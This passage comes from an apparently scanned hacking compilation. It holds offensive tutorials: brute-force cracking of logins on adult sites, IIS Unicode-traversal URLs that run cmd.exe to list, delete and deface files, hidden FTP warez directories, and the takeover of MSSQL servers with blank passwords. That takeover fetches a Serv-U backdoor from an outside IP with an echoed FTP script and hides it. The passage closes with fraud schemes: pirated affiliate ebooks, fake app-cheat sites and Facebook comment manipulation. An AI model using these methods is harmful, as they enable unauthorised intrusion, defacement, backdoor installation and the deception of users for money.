"progress" box with a whole column of "401-unauthorised" replies. If so everything is going according to plan and with a bit of luck Mail:mtahirzahid@yahoo.com

Page 459


Power Of Hacking速 you might see a cracked login appear below the progress column. Congratulations, you just cracked your first site!! Part 5 - What should I look for while the test is running? Keep an eye on the progress page! -If you want you can gradually increase the number of bots; on a 56k dialup with no other online activity you should be able to run around 75-80 bots. Too many bots will cause a sharp increase in 404 errors. If you see the 404s increasing, decrease the bots. A large number of 403 errors means the site is going to be a bit of a challenge and will probably need a lot of proxies to crack it. You can maximise the life of each proxy by checking the "rotate proxies" box on the proxy tab. The number of logins before rotating will vary from site to site and its a matter of trial and error, experience and advice to get it right. If the test seems to be going extremely slowly - give up and try another site. Some sites just weren't made to be cracked by beginners! Part 6 - Anything else I should know? This is a very basic introduction to cracking adult sites. You can't have your hand held forever so if you want to get better at it you need to put some effort into it. Play around with the program. Experiment with different functions but specifically become familiar with the exploiter facility - it can sometimes deliver golden eggs! On the web word leecher, go to the urls found tab and check the box marked extract urls during the process. Save the cracked sites found in your history. Learn how to "refresh the login status" of the sites in your history. Download a copy of Raptor and use it to compile wordlists and site lists. Keep updating your main wordlist but keep your old ones too! Some sites are not crackable using this method - the ones that do not allow the member to choose his own login or pass . iBill frequently - but not always - use this method. don't waste your time on these sites. If you enjoy cracking and you get comfortable with it - get a request manager and start doing some cracking for the group - if you are any good you'll be noticed and probably get AOPed with all the financial security and Mail:mtahirzahid@yahoo.com

Page 460


Power Of Hacking速 seex on tap that brings. IIS Hacking Tutorial Hacking an iis server is pretty much like taking candy from a baby. No really its that easy. In this tutorial im going to walk you through 0wnz'ing your very own iis server and show you haw to deface the site but i seriously dont encourage this. I dont agree with needless defacing unless its your first time, but im not against defacing to stand up for your rights, punish a site with bad intensions(even though the site can be rebuilt) or to make a strong point. If your going to use the *i defaced your site because it had bad security*, you could just as easily mail the admin. Im telling you all how to do this so u know how easy it is. Please dont abuse the information i give you. --------------------------------------------************ Finding vulnerable servers: There are *many , many* vulnerabilities with iis but im going to discuss one of the latest. This vulnerability allow the execution of arbituary code. To see if a site is vulnerable try these links www.TARGET.com/scripts/..%255c..%25....exe?/c+dir+c:\ www.TARGET.com/msadc/..%255c..%255c....exe?/c+dir+c:\ www.TARGET.com/cgi-bin/..%255c..%25....exe?/c+dir+c:\ www.TARGET.com/samples/..%255c..%25....exe?/c+dir+c:\ www.TARGET.com/iisadmpwd/..%255c..%....exe?/c+dir+c:\ www.TARGET.com/_vti_cnf/..%255c..%2.../system32/cmd.e xe?/c+dir+c:\ www.TARGET.com/_vti_bin/..%255c..%2.../system32/cmd.e xe?/c+dir+c:\ www.TARGET.com/adsamples/..%255c..%.../system32/cmd.e xe?/c+dir+c:\ Mail:mtahirzahid@yahoo.com

Page 461


Power Of Hacking速

If the server is vulnerable you should get a listing of the C drive. If none of these links work, the server probably isn't vulnerable. Ok, so lets say you got a list or the c content, it should look something like: --------------------------------------------Directory of c:\ 11/15/02 08:50a (DIR) WINNT 11/15/02 09:15a (DIR) Program Files 11/15/02 09:20a (DIR) TEMP 11/15/02 09:21a (DIR) CPQ SYSTEM 11/15/02 09:50a (DIR) Inetpub 11/27/02 08:11a (DIR) CPQSUPSW 11/29/02 09:12a (DIR) CA_LIC 12/01/02 09:42a 140 server ip address.txt 04/06/02 04:44p 55,769 systemlog 06-04.txt 05/04/02 12:32p (DIR) test 10 File(s) 1,159,703,933 bytes 1,322,123,264 bytes free --------------------------------------------To navigate just change the links to: /system32/cmd.exe?/c+dir+c:\winnt For example to navigate to the WINNT directory To navigate to a folder such as CPQ SYSTEM you would have to put: /system32/cmd.exe?/c+dir+c:\cpqsys~1 There must be six characters before the ~1 and no spaces (Normal rules DOS). Use DOS on your (or where ever there is a win32 b0x) own pc, this will greatly help you when it comes to using simple commands such as copy, or listing content of a directory. Now in order to find the main page of the website. We must find the webroot. The webroot is the path in which all the files for the site are held, including the main page. In my experience the webroot is usually found on the D: drive but it can be any directory the Mail:mtahirzahid@yahoo.com

Page 462


Power Of Hacking速 admin chooses. Try: /system32/cmd.exe?/c+dir+d:\ This should list the content of the drive D drive. Also a good tip, a lot of sites have *mock* webroots, in which you think you have found the sites main page but its not really, just a copy. You will have to visit the site and find the size of the main page and the other pages linked to it (right click and click properties - Normal win32 trik) and then match it up with the files in the webroot to find the real main page. --------------------------------------Now is a good time to give you some commands that will come in useful: To list all chosen files on the server use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever To DOWNLOAD a file use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20type\c%20c:\whatever.file When asked: What would you like to do with this file? choose: *run this program from its current location*. Choosing save to disk will get you a properties report of that file or something like that. To DELETE (del) a file use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20del%20c:\whatever.file To make a text file use: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20echo%20You txt goes here!!!!!>%20test.txt -------------------------------------************ Changing the mainpage.htm Now on to the important part, editing the websites main page. HTML is not needed but if Mail:mtahirzahid@yahoo.com

Page 463


Power Of Hacking速 you want to an in any way decent looking deface you need to know it. If you dont know it dont worry and text in a file with .htm or .html extension will show up in a browser. If you want to learn html it can be done by anybody, i learned the basics in about 1 day. Ok, enough woman - girlie! talk, to the man stupid - you have to copy the file CMD.exe to the directory with the page in it, lets call this page, wannabie_admin.html and lets say the directory wannabie_admin.html is in is C:\home\site So the COPY command: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20C:\home\site\CMD. exe That will copy CMD.exe (like command.com in win98) to d:\home\site now to paste the text we want into wannabie_admin.html: www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/ home/site/CMD.exe?/c%20echo%20Damn Wannabies! You run IIS and you just been cracked>%20wa nnabie_admin.html Now your text should now be on the main page. If you echo html code into wannabie_admin.h tml, youll get a much better defacement. If your are going to do it, do it RIGHT! -------------------------------------Please, please listen to me, IIS servers >>>-LOG-<<< all the stuff! so use a >>>-PROXY<<< or else pay the price! Invisible Directories: They are directories that doesn't get listed. A sample path of an invisible directory is: /.tmp/ /folder1/ The 'space' isn't a name, but a character, so it can't be listed, and the user won't see anything beyond the .tmp folder. The 'period' in front of tmp is to hide it from conventional FTP clients and somewhat from the site admin because by default, folders with a "." in front of them are considered to be hidden files and does not get listed by default. I found Mail:mtahirzahid@yahoo.com

Page 464


Power Of Hacking速 that SmartFTP can 'see' these so-called invisible directories (/ /) by default. To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with spacebar) in following steps after hitting the insert key to create dirs. You have to create the directory in step one first before you can create the directory in step two and so on: /.tmp/<space>/ /.tmp/<space>/<space>/ /.tmp/<space>/folder1/ <-- This is your working directory.

Inaccessible Directories: These are directories that you can't enter even if you see it. You can simply type the following in this order to do this: /folder1<space>/<space>/ /folder1<space>/folder2/ <-- This is your working directory. You won't be able to get pass /folder1 / unless you know the name of folder2. A safer method is to use the following "unusable names". COM1, COM2, COM3, COM4 -- Windows COM Ports LPT1, LPT2, LPT3, LPT4 -- Windows Printer Ports If you try to enter such a directory, you'll be returned with an incorrect function. A sample path of an inaccessible directories is: /COM1 /folder1/ To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with spacebar) in the following steps after hitting the insert key to create dirs:

Mail:mtahirzahid@yahoo.com

Page 465


Power Of Hacking速 /COM1<space>/<space>/ /COM1<space>/folder1/ <-- This is your working directory. Step-by-Step Sample Invisible/Inaccessible Dir: Again, enter the following exactly as you see it and replace the <space> with your spacebar and "folder1" and "folder2" with anything you want: /<space>/<space>/ /<space>/COM1<space>/<space>/ /<space>/COM1<space>/<space>/<space>/ /<space>/COM1<space>/<space>/LPT1<space>/<space>/ /<space>/COM1<space>/<space>/LPT1<space>/yourname<space>/<s pace>/ /<space>/COM1<space>/<space>/LPT1<space>/folder1<space>/folder 2/ Confusing?

Your working directories is the last line, or this:

/ /COM1 / /LPT1 /folder1 /folder2/ It is hidden through two (no name) folders and made inaccessible by one folder (folder1) and two "unusable names" (COM1, LPT1). Just want to say that the above examples are assuming that you're making dirs in the root. Most likely, you'll encounter pubs that only allow read/write access to only certain directories such as "/upload", "/pub", "/incoming", "/_vti_pvt", and others. In that case, you'll have to add this to the path at the beginning. For example, if the working directory is "pub", then you'll have: /pub/<space>/<space>/ /pub/COM1<space>/<space>/ /pub/COM1<space>/<space>/<space>/ -- and so on... Be creative in creating directories!

Mail:mtahirzahid@yahoo.com

Page 466


Power Of Hacking速 This Tutorial is written in mind, that you already have hacking experience. And know the basics. Which will not be covered in this tutorial. This is the easiest way in my mind to Hack SQL. Im no expert. But have tried a lot of different ways. Anwayz, get Hacking! Tools You'll Need -------------------------------------SQL Exec [Here] ServUDaemon or Winmgnt.exe [Serv-U Here or Winmgnt Here ] Anonymous or Personal FTP Configured ServUDaemon.ini [Gotta get this Yourself ] Other Useful Utilities Pack [Here] Make a Nice Shortcut on your Desktop to SQLExec, your going to be using it quite a lot.

Open up SQLExec and it should look like this:

Mail:mtahirzahid@yahoo.com

Page 467


Power Of Hacking速

Now you are ready to use scans in this Format:

[127.0.0.1 ]: Found Mssql account: sa/[NULL] Enter in the info like so:

Mail:mtahirzahid@yahoo.com

Page 468


Power Of Hacking速

And Click the connect button. If the Server is up, and the user/pass is correct the connect button should turn grey.

You are now connected to the server. If you cant seem to connect, the server info has changed or been patched. Moving On.... The Main Commands for SQLExec are: dir c:\ This will list the "c:\" drives contents and show free space, change the drive letter accordingly. md c:\recycler\_tmp Will make any directory you tell it to, this command creates the folder "_tmp" in c:\recycler. del c:\recycler\filename.exe Will delete any file you tell it to.

Mail:mtahirzahid@yahoo.com

Page 469


Power Of Hacking速 copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp This moves the file specified to any directory you wish. Great for hiding your Serv-U Files after you transferred them. ------------------------------------------------------------------------------The commands above are the most common used. Now we are ready to hack some stro! Stop - Make sure you have done everything so far, and have read carefully. You should be connected to the victim, enter in the command box "dir c:\" and press enter. The person's c:\ drive listing should show up with Free Drive Space:

This is the command set for getting your Serv-U files from your Anonymous Pub you setup earlier to the server. This tells the client to connect to IP: 127.0.0.1 on Port 21. And download Winmgnt.exe and Servudaemon.ini from the root. echo echo echo echo

open 62.2.239.111 >> C:\3.txt anonymous >> C:\3.txt anonymous@dude.com >> C:\3.txt BINARY >> C:\3.txt

Mail:mtahirzahid@yahoo.com

Page 470


Power Of Hacking速 echo get tsksrv.exe >> C:\3.txt echo get ml_hconf.dll >> C:\3.txt echo quit >> C:\3.txt ftp -i -s:C:\3.txt You enter in these commands one by one, after entering in the first one you should get a beep, or "SQL_NO_DATA". After you get eiter of these move onto the next command. The last command "ftp -i -s:C:\3.txt" will have the computer connect and download the files. SQLExec will "lock-up" during the time it is downloading, then the screen will re-appear when done & should show the following:

The Default directory that the serv-u files goto is "system32". Most stro's its c:\winnt\system32. So in our command box, type dir c:\winnt\system32\ That will list the system32 directory. Like So

Mail:mtahirzahid@yahoo.com

Page 471


Power Of Hacking速

Now that your files are on the computer its time to hide them. In your command box type md c:\recycler\_tmp That is where we will hide the files.

Now type copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp and Press Enter. Then type: copy c:\winnt\system32\ ml_hconf.dll.ini c:\recycler\_tmp Now your files are well hidden from the sys-op. You are now ready to start your server. Copy the IP to the Clipboard. Because you will need it. To start the server simply type: c:\winnt\system32\tsksrv.exe SQLExec should now Lock up for good. And if everything went well you should be able to connect to your server on the port you setup. See Part 2

Mail:mtahirzahid@yahoo.com

Page 472


Power Of Hacking速

Other Things to Do After Your Server is Running

1. Getting your Server to Auto-Start with the Computer: Open up your Site in FlashFXP. Get setit.exe from the Needed Utilities up above, put it in the folder where your files are located, and press "Control R" and enter "site exec setit.exe servername.exe" That will put your server to Auto Start with the PC.

2 Securing the Server from being Rehacked: Open up your site in FlashFXP. Get "osql" here and put it in the MSSQL\binn folder usually found in c:\ or c:\Program Files\Microsoft SQL Server\MSSQL\binn Make sure osql.exe is in the "binn" folder. Or this will not work!

Sometimes the osql.exe is already on the server, and sometimes the sysops remove it. So its good to have. Now you are going to change the Server's Password (The one you used to connect in SQLExec) Here are the commands you will use in FlashFXP Mail:mtahirzahid@yahoo.com

Page 473


Power Of Hacking速 For blank pass: site exec osql.exe -U sa -P "" -Q "sp_password NULL,Logon,sa" For sa pass: site exec osql.exe -U sa -P "sa" -Q "sp_password sa,Logon,sa" for password pass: site exec osql.exe -U sa -P "password" -Q "sp_password password,Logon,sa" For admin pass: site exec osql.exe -U sa -P "admin" -Q "sp_password admin,Logon,sa"

That will change the Logon to sa/Logon instead of sa/sa or sa/blank. Securing it from being rehacked.

Thats all Folks! Happy h4x0ring!!

Closing Notes: I spent many hours on this tutorial. I know it's not perfect, im open to suggestions/comments. But please do not give this out without giving full credit to me (the author

Not that anybody here would to that.

Want to make 800 a month doing nothing? Mail:mtahirzahid@yahoo.com

Page 474


Power Of Hacking® Well of course you would, why wouldn’t you? It’s easier than you thought and this file has sure proven ways to make you rich quick. Don’t waist your time with cheap affiliate programs and pyramid scams. It’s a lot easier to just download a little plug-in! Just follow these easy steps:

1. Sign up at http://www.download4cash.tk 2. Advertise your site, make an e-book, and submit your site to search engines. (Hint: use peer 2 peer file sharing programs like Kazaa or WinMX) 3. Sit back and collect your money! I wish you the best of luck on your trip to becoming rich like me! Have fun! And Good luck!

Guranteed Money Making Guide - 100% workable

Hey guys, here's my first guide on BHW. Being in the info marketing business, I've come into contact with hundreds of different methods to making money online. Some WhiteHat (which I teach and sell), and some BlackHat.... Which honestly would hurt my reputation if I taught or sold them to my list. So here's where you guys stand to benefit. Hehe. Ok so here's the basic mindset for this method. I've come to a conclusion that "pirates" however cheap as they come, are unable to get over one big manly flaw, SEX. And my tests have proven, that pirates PAY on a higher consistency than the average online porn surfer. This translates into much higher conversion rates, with a much larger somewhat untapped market. Here's basically what I did: Step 1: Get (or ahem purchase) dating guides (ebooks/videos/seminars) online. It's best to get guides that concentrate on "getting sex/dates online via dating sites". Scrape them and summarize them into an ebook less than 5 pages long. Too long of an ebook will decrease conversion rates. Step 2: Reword the ebook mentioning the dating sites that seem to work best for your methods. Mail:mtahirzahid@yahoo.com

Page 475


Power Of Hacking速 Add in 2 of your recommended dating sites' affiliate URL in the beginning and end of the ebook (more about which dating site to choose at the bottom of this guide). Step 3 (Crucial): Simply submitting the ebooks with titles like "How to get sex online" or "How to find horny women online" is going to get you banned. Torrent/P2P sites hates free stuff, and I'm sure the few of you who have tried this would know best. So to combat this, you want to change your title and description to something like this... "$3997 Underground Online Dating Guide - Only sold to 10 people" or any variation to this. Basically you want everyone to know that the ebook WASN'T FREE, and it costs a bomb to get such an exclusive guide. Remember to make up a guru name like "Mr. Playboy". Step 4: Start submitting the ebook to top torrent sites, p2p like limewire, rapidshare/megashare forums (this works very well) and finally private torrent sites (if you have access to them). Step 5: Change or rearrange a few sentences or paragraphs in your ebook, then change the title to something different. The basic content and affiliate link remains the same. Repeat Step 4. Step 6: Repeat Step 5 and 4 every few days. Step 7: Watch your affiliate stats grow exponentially. Now I've tried a great number of adult dating sites, so here are two of my best performing STATS and results: Disclaimer: These are my stats from various testing which I don't track. So you should be able to get even higher conversion rates which turns to higher per signup $$$: #1 - Iwantu 7 uniques per FREE signup ($7.10 per free signup) 71 uniques per PAID signup ($50 *35/week* to $100 *279/week* per paid signup) By far my best performing dating site, choose the Pay per Profile for starters and once you see more and more traffic, start using the Pay per Signup campaign instead. #2 - AdultFriendFinder

Mail:mtahirzahid@yahoo.com

Page 476


Power Of Hacking速 5 uniques per FREE signup ($0.35 per click) 55 uniques per PAID signup ($100 per paid signup) My 2nd best performing affiliate site, only Pay Per Order is worth using. Now although AFF converts at a higher percentage than IWantU, the amount of traffic I get on IWantU is substantially higher, even when I placed the IWantU affiliate link AFTER AFF on my ebooks. I would assume that most downloaders of my ebooks already have a current account with AFF. Ultimately IWantU has much higher profits. Don't bother trying Rev/Percentage sharing, they have consistently only got me 1/4 to 1/3 the profits of per signups. Not worth it. This guide is pretty staight forward as you can see. Try to use a valid proxy while submitting your ebooks. I don't want to gloat about how much I've earned from using this method, but let me assure you that you shouldn't have any problems seeing 4 digits per day once you get the hang of this. I've now moved on to other methods, but being a human being, still appreciates a thanks now and then and the ever so obvious webmaster referrals commissions. If there are any questions or comments, just post here (the PM system doesn't really work on Firefox for me). [METHOD] How To Make Money With Your Favourite App! So as the title says, this is a method that I very recently found here. It sounded reasonably simple to execute, so I gave it a go, and as I expected - it worked. If you're looking to make thousands a day using this method, then I don't think that's going to be easy - but if you're just starting up and you're looking for a very simple and straight forward method, then this should be a perfect fit for you. STEP 1 The original method involved using special events such as the Superbowl or the World Cup but in my case, I found the app niche to work out perfectly. What you're looking to do is find any popular app on the App Store, or on Google Play. For example, for my initial test I picked the app 'Crossy Road'. For my second execution, I picked 'Tinder Plus'. What you're looking to do is pick something which you can provide 'cheats' or 'hacks' for. For example, for my first attempt, I picked 'Crossy Road' - a game where your character must cross each road by dodging the oncoming vehicles. I realised the game was more than frustrating once you got to a higher level and so I wanted to provide people with the 'solution' to getting rid of their frustration. In this case, I offered users an 'invincibility glitch'. For the 'Tinder Plus' Mail:mtahirzahid@yahoo.com

Page 477


Power Of Hacking速 app, I offered to provide 'free access to Tinder's pro features'. STEP 2 So once you have found an app which you can give away something for (whether that's a cheat, hack, gold, gems, coins whatever), you want to register a quick domain for it. Doesn't really matter what you choose so long as its relevant to what you're offering. We're going to be monetising this site with mobile offers, but you can choose to monetise it any way you like (although mobile offers seem to work best when working with apps). Now the design of the site is completely up to you, but as you can imagine, the more 'convincing' it looks - the better your site will convert. I've seen some extremely basic sites out there that are working well, so don't stress out too much about the site. Just make sure you have a clear CTA and also ensure that your site looks fine on mobile. I would recommend using a responsive theme which basically takes care of everything for you. Here is an example of a pretty simple site I found (some as basic, and some looked pretty convincing - but like I said, it won't matter too much so long as your site isn't completely horrific).

I'm pretty sure you can make yours look much better than the above but I hope you get the idea. Just have a simple landing page, add a few images, add some content and instructions and then have a big enough link or CTA that stands out and screams 'click me!'. To monetise the site, like I said I used mobile offers and there are plenty of networks out there you can join. I used Ogmobi - but there are lots out there. The way it works is whenever someone installs and opens a free app, you get paid. Payouts are usually anywhere between $0.35 on the low side to around $0.85 on the higher end. This might not seem like much but unlike other offers where people need to fill out 10 minute surveys, this has a much higher Mail:mtahirzahid@yahoo.com

Page 478


Power Of Hacking速 conversation rate. After all, all it takes is for them to install an app and that never takes over a minute or 2. You don't have to actually 'provide the cheat' but if you want - you can always redirect the user to a video on Youtube with the cheat or something similar. Be creative here. STEP 3 Now that you have actually created a site or a landing page - you need to promote it. Now you could choose to do forum spamming, SEO etc but here we do something different. I give full credit to the original poster of this method (link at the top of this thread) for this technique. We're going to use Facebook. Make sure you use a dummy account for this (you'll understand why in a bit) and it would be good if you could phone verify it. Once you're logged in, go ahead and search for a page related to the app you are promoting. In my case, I picked the official page for the game.

I would avoid pages with lower 'likes' as you probably won't reach a wide enough audience. Find one of the latest posts on the page, and comment something a little similar to:

Mail:mtahirzahid@yahoo.com

Page 479


Power Of Hacking速

Feel free to be creative with whatever you say. Just make sure you tell people what they can get, and make sure you mention the 'give this a thumbs up if it worked for you' statement. Now that you've posted it - it's probably gone to the bottom of the comments pile. We're going to use Likelikego to boost it. STEP 4 When you're on Likelikego, click on 'get an access token' and then follow the instructions. There is a detailed explanation here. What you're basically doing is boosting your comment to the top of the comments list. Now make sure you're aware that on some pages it will be really hard to go to the top (especially if the top comments have 1000+ likes etc - which is why I recommend picking an app or game that is not too popular, but at the same time, has enough potential to bring in traffic). Once you've boosted your comment to the top, it should look something like:

Mail:mtahirzahid@yahoo.com

Page 480


Power Of Hacking速

You should find your comment at the top of the list. Now.. if you don't find your comment at the top, then I would recommend trying it again but without the link. It should work, and after around 15 minutes edit and add in your link to the site. One thing I have noticed from doing this is that Facebook can sometimes restrict your comments from going to the top even if you have the 'likes' and there's no way around this except from creating another account. To avoid this type of restriction, keep your posts looking natural and not spammy. Don't post comment after comment just to try and bang out quantity. STEP 5 You can always go the step further and have another account to reply to on your first comment. You could say something like 'can't believe this actually worked - thanks!' and then send some likes to that comment too. Again, be creative. Repeat this step on different posts and pages you find related to your app - but like I said, keep everything natural as you don't want to get any restrictions. Take it too fast and you could also possibly be banned by the page admin from sharing links on that particular page (in which case you simply need another account). Mail:mtahirzahid@yahoo.com

Page 481


Power Of Hacking速 There are also other sites you can use to increase your likes in the same way, such as this and this. More likes = better chance of ranking top of the comments pile. I've seen some people order likes from Fiverr but I see no reason why you'd need to do that when you can get hundreds of likes for free using sites like the above. Notice how I used a bit.ly link. This allows me to track the clicks and traffic. After doing the initial test on this method myself, I got a few of my VA's doing it for me. I've tried different apps and niches (remember, you don't have to just do apps. Like the original poster of this method, you could do sports events, phone unlocks, live streams, etc). Don't just stop after posting on a single page. Find other related pages and post there too. Build more accounts, post in different places and boost all the comments. Here are some of the stats on one of my campaigns (one of my newer ones):

You're probably wondering how many of those 447 people converted and went through with the mobile offer on my site? Take a look:

Mail:mtahirzahid@yahoo.com

Page 482


Power Of Hacking速

As you can see, around 200 of the 447 people went through by clicking the CTA to the mobile offer page - and then around 100 of those 200 people converted by installing a free app - and I was paid anywhere from $0.30 - $1 per conversion. Note that some offers pay higher than others depending on the country of the user, device, etc. Now if you're thinking 'whaaat.. only $58.30' then think again.. this is just from 1 site. For those who have the time to execute different campaigns for different apps, you could potentially make good money from this providing the users are converting on your site. Obviously a better designed landing page will convert more than a simple page with text blocks and text links. I'm not saying this method is a gold mine but if used correctly, it does work. And to be honest, the only investment you need is the money for the domain (everything else is all down to how much time you are willing to allocate working on this).

Mail:mtahirzahid@yahoo.com

Page 483


Turn static files into dynamic content formats.

Create a flipbook
Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.